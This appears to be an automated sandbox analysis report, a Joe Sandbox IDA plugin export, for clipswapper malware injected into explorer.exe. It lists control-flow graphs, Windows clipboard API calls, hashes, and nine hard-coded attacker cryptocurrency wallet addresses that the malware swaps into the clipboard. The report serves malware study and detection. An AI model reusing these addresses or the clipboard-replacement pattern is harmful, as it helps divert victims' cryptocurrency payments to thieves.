                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-3773165574
                                                                                                                                                                                                                        • Opcode ID: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction ID: 371d0ced97e3b59219bb3e5735cd061428e15f743dbb177a3ca7a60a26f7fe22
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2D12E61715646A9DF00EFA9D8542EC3326EB957DCFC2D4228F0E5BA58EF64CA09C350
                                                                                                                                                                                                                        Function 0E117F00 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1081 e117f00-e117f2a call e118550 1084 e117f30-e117f66 call e1184b0 call e102c10 call e117df0 call e1185e0 1081->1084 1093 e117f68-e117fc6 call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1084->1093 1094 e117fcb-e117ff8 call e102c10 call e117df0 call e1185e0 1084->1094 1093->1094 1107 e117ffa-e118058 call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1094->1107 1108 e11805d-e11808a call e102c10 call e117df0 call e1185e0 1094->1108 1107->1108 1129 e11808c-e1180ea call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1108->1129 1130 e1180ef-e11811c call e102c10 call e117df0 call e1185e0 1108->1130 1129->1130 1149 e118181-e1181ae call e102c10 call e117df0 call e1185e0 1130->1149 1150 e11811e-e11817c call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1130->1150 1170 e1181b0-e11820e call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1149->1170 1171 e118213-e118240 call e102c10 call e117df0 call e1185e0 1149->1171 1150->1149 1170->1171 1191 e118242-e1182a0 call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1171->1191 1192 e1182a5-e1182d2 call e102c10 call e117df0 call e1185e0 1171->1192 1191->1192 1212 e1182d4-e118332 call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1192->1212 1213 e118337-e118364 call e102c10 call e117df0 call e1185e0 1192->1213 1212->1213 1233 e118366-e1183c4 call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1213->1233 1234 e1183c9-e1183f6 call e102c10 call e117df0 call e1185e0 1213->1234 1233->1234 1254 e1183f8-e118456 call e101100 call e102c10 call e117df0 call e118650 call e102c10 call e1186a0 call e101200 1234->1254 1255 e11845b-e11846a Sleep call e101200 1234->1255 1254->1255 1261 e11846f 1255->1261 1261->1084
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: OpenClipboard.USER32 ref: 0E1184C1
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: GetClipboardData.USER32 ref: 0E1184D3
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: GlobalLock.KERNEL32 ref: 0E1184E4
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: GlobalUnlock.KERNEL32 ref: 0E1184F5
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: CloseClipboard.USER32 ref: 0E1184FB
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: GlobalAlloc.KERNEL32 ref: 0E1186C8
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: GlobalLock.KERNEL32 ref: 0E1186DF
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: GlobalUnlock.KERNEL32 ref: 0E1186F7
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: OpenClipboard.USER32 ref: 0E1186FF
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: EmptyClipboard.USER32 ref: 0E118705
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: SetClipboardData.USER32 ref: 0E118713
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: CloseClipboard.USER32 ref: 0E118719
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0E118460
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0E118366
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0E1181B0
                                                                                                                                                                                                                        • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 0E117F68
                                                                                                                                                                                                                        • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 0E11811E
                                                                                                                                                                                                                        • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 0E117FFA
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0E118242
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0E1183F8
                                                                                                                                                                                                                        • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 0E11808C
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0E1182D4
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-3773165574
                                                                                                                                                                                                                        • Opcode ID: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction ID: ad3aa48833f987bdc4b42a26cc7a0c777b361f02ab46d8d042e9e88a98747363
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BD11D71711A46A5DF00EFA1E4543EC63A6E7557CCFC08822AE0D6BB99EF74CA89C350
                                                                                                                                                                                                                        Function 0FF57F00 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1278 ff57f00-ff57f2a call ff58550 1281 ff57f30-ff57f66 call ff584b0 call ff42c10 call ff57df0 call ff585e0 1278->1281 1290 ff57f68-ff57fc6 call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1281->1290 1291 ff57fcb-ff57ff8 call ff42c10 call ff57df0 call ff585e0 1281->1291 1290->1291 1304 ff5805d-ff5808a call ff42c10 call ff57df0 call ff585e0 1291->1304 1305 ff57ffa-ff58058 call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1291->1305 1325 ff5808c-ff580ea call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1304->1325 1326 ff580ef-ff5811c call ff42c10 call ff57df0 call ff585e0 1304->1326 1305->1304 1325->1326 1346 ff58181-ff581ae call ff42c10 call ff57df0 call ff585e0 1326->1346 1347 ff5811e-ff5817c call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1326->1347 1367 ff581b0-ff5820e call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1346->1367 1368 ff58213-ff58240 call ff42c10 call ff57df0 call ff585e0 1346->1368 1347->1346 1367->1368 1388 ff582a5-ff582d2 call ff42c10 call ff57df0 call ff585e0 1368->1388 1389 ff58242-ff582a0 call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1368->1389 1409 ff582d4-ff58332 call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1388->1409 1410 ff58337-ff58364 call ff42c10 call ff57df0 call ff585e0 1388->1410 1389->1388 1409->1410 1431 ff58366-ff583c4 call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1410->1431 1432 ff583c9-ff583f6 call ff42c10 call ff57df0 call ff585e0 1410->1432 1431->1432 1451 ff583f8-ff58456 call ff41100 call ff42c10 call ff57df0 call ff58650 call ff42c10 call ff586a0 call ff41200 1432->1451 1452 ff5845b-ff5846a Sleep call ff41200 1432->1452 1451->1452 1457 ff5846f 1452->1457 1457->1281
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: OpenClipboard.USER32 ref: 0FF584C1
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: GetClipboardData.USER32 ref: 0FF584D3
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: GlobalLock.KERNEL32 ref: 0FF584E4
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: GlobalUnlock.KERNEL32 ref: 0FF584F5
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: CloseClipboard.USER32 ref: 0FF584FB
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: GlobalAlloc.KERNEL32 ref: 0FF586C8
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: GlobalLock.KERNEL32 ref: 0FF586DF
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: GlobalUnlock.KERNEL32 ref: 0FF586F7
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: OpenClipboard.USER32 ref: 0FF586FF
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: EmptyClipboard.USER32 ref: 0FF58705
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: SetClipboardData.USER32 ref: 0FF58713
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: CloseClipboard.USER32 ref: 0FF58719
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0FF58460
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 0FF5808C
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0FF58242
                                                                                                                                                                                                                        • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 0FF57F68
                                                                                                                                                                                                                        • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 0FF57FFA
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0FF582D4
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0FF583F8
                                                                                                                                                                                                                        • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 0FF5811E
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0FF581B0
                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0FF58366
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-3773165574
                                                                                                                                                                                                                        • Opcode ID: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction ID: 9318a5947c9c239db7121f796cdd3a10d269bb3730df767fae6382b6c1d0c938
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFD11762710B46A5DF10EFA1DC942EC3766EB54BDCFC045229F0D9BA5AEF28D209C390
                                                                                                                                                                                                                        Function 0DFAA510 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1502 dfaa510-dfaa58a call dfe07c0 call dfa8fa0 1508 dfaa58c-dfaa59e call dfe0810 1502->1508 1509 dfaa607-dfaa61b call dfe0750 call dfe0888 SleepEx 1502->1509 1514 dfaa5b0-dfaa5d7 StrChrA call dfe0818 1508->1514 1515 dfaa5a0-dfaa5a5 call dfaa990 1508->1515 1522 dfaa5d9-dfaa5dc 1514->1522 1523 dfaa5e0-dfaa5e3 1514->1523 1515->1509 1522->1523 1524 dfaa602-dfaa605 1523->1524 1525 dfaa5e5-dfaa5fd call dfe0828 call dfaa880 1523->1525 1524->1509 1524->1514 1525->1524
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFAA56F
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: EnterCriticalSection.KERNEL32 ref: 0DFA8FE8
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: RtlInitializeCriticalSection.NTDLL ref: 0DFA8FF5
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA902A
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA904D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA905D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA906D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: LeaveCriticalSection.KERNEL32 ref: 0DFA90F4
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: memcpy.MSVCRT ref: 0DFA910C
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrlenA.KERNEL32 ref: 0DFA911A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0DFAA596
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAA60A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DFAA615
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction ID: b821c62645d03fd52759485b8e6c90ac6f71ad590b3db74959e5a3d479d89401
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A218061609B42C5DB55DF69F84036AB7E6FB88B84F44C036DA8A47B24EF7CC148C754
                                                                                                                                                                                                                        Function 0DFA9C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        • Opcode ID: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction ID: 79ff980327ec098ff69b7e5626e8a1302d3d8fe38ab61a01a09815ce0080b293
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6311876618A81DAD750CFA9F84035EB7B5FB89344F90542AEB8D83A28EB7DC544CF10
                                                                                                                                                                                                                        Function 0DFA9B30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        • Opcode ID: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction ID: b31f7eb997e47f8d26a24996d7843b34d6fb240958598821e445f95d256e2e31
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93314C322187C4DAD751CFA9E85035BBBA2F799344F54402AEBC983A28DB7CC509CF10
                                                                                                                                                                                                                        Function 0DFA8B30 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction ID: f11efa531c5c0fa3de59b00a52b104b134c76e144254d5694340872be37f4bf8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62016D76A12B4192DB448F6AE89432D7362FB88BD4F08C036DA1B03724CF38D062C740
                                                                                                                                                                                                                        Function 0DFBBE40 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction ID: df08dc1531fd7c69023c7b8cc76abb1cc3693a132061bc285847839f022eef89
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2E08660A1270292EF1A27B268593BD2222DB5DB52F489439C90B45360EE2CC1D58310
                                                                                                                                                                                                                        Function 0E11BE40 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction ID: 1b83d7ea0255d8b6a0510d2e5cf96058077ae7951d79464b00a8c8d6bc827724
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62E08C70A26740C3EF2A1771E8993AE13A1AB5CB81F5418B8C90A653A0EF3C86D98700
                                                                                                                                                                                                                        Function 0FF5BE40 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
